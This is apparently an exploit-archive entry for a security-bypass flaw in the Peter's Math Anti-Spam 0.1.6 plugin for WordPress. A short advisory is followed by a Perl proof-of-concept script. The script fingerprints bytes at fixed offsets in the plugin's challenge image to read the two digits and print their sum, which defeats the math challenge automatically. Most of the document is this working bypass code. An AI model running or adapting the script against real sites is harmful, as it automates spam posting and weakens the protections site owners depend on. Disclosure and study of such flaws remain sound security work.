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2.3 KiB
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2.3 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/27287/info
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Peter's Math Anti-Spam for WordPress is prone to a security-bypass vulnerability.
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This issue occurs when presenting a visitor with challenge data to determine if they are a legitimate user or an automaton. The challenge data is poorly obfuscated and can be interpreted by script code.
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Attackers can leverage this issue to bypass the security measures provided by the plugin via an automated script. This could aid in spam distribution and other attacks.
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Peter's Math Anti-Spam for WordPress 0.1.6 is vulnerable; other versions may also be affected.
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$ cat math_spam.pl
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#!/usr/bin/perl -w
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require bytes;
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my $buffer;
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my $number;
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my $op1;
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my $op2;
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my %numberPrints = ("0045", 0,
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"00c5", 1,
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"0485", 2,
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"4309", 3,
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"0205", 4,
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"0847", 5,
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"0601", 6,
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"0644", 7,
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"0405", 8,
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"0031", 9);
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my %numberSizes = ( 0, 4045,
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1, 3983,
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2, 4431,
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3, 4250,
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4, 4595,
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5, 5389,
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6, 4949,
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7, 4436,
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8, 4584,
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9, 5009);
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my $PLUS_SIZE = 7365;
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open (INFILE, "<$ARGV[0]");
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binmode(INFILE);
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sysseek(INFILE, 14, 0); #That "0" third argument makes seeking
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absoulte
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sysread(INFILE, $buffer, 2);
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#$number = sprintf("%x%x", map {ord($_)}
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split(//,substr($buffer,0,2)));
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$number = sprintf("%.2x%.2x", map {ord($_)} split(//,$buffer));
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$op1 = $numberPrints{$number};
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sysseek(INFILE, $numberSizes{$op1} + $PLUS_SIZE - 2, 1); #That
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third "1" argument makes seeking relative
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sysread(INFILE, $buffer, 2);
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$number = sprintf("%.2x%.2x", map {ord($_)} split(//,$buffer));
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$op2 = $numberPrints{$number};
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print $op1 . " + " . $op2 . " = " . ($op1+$op2) . "\n";
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close(INFILE); |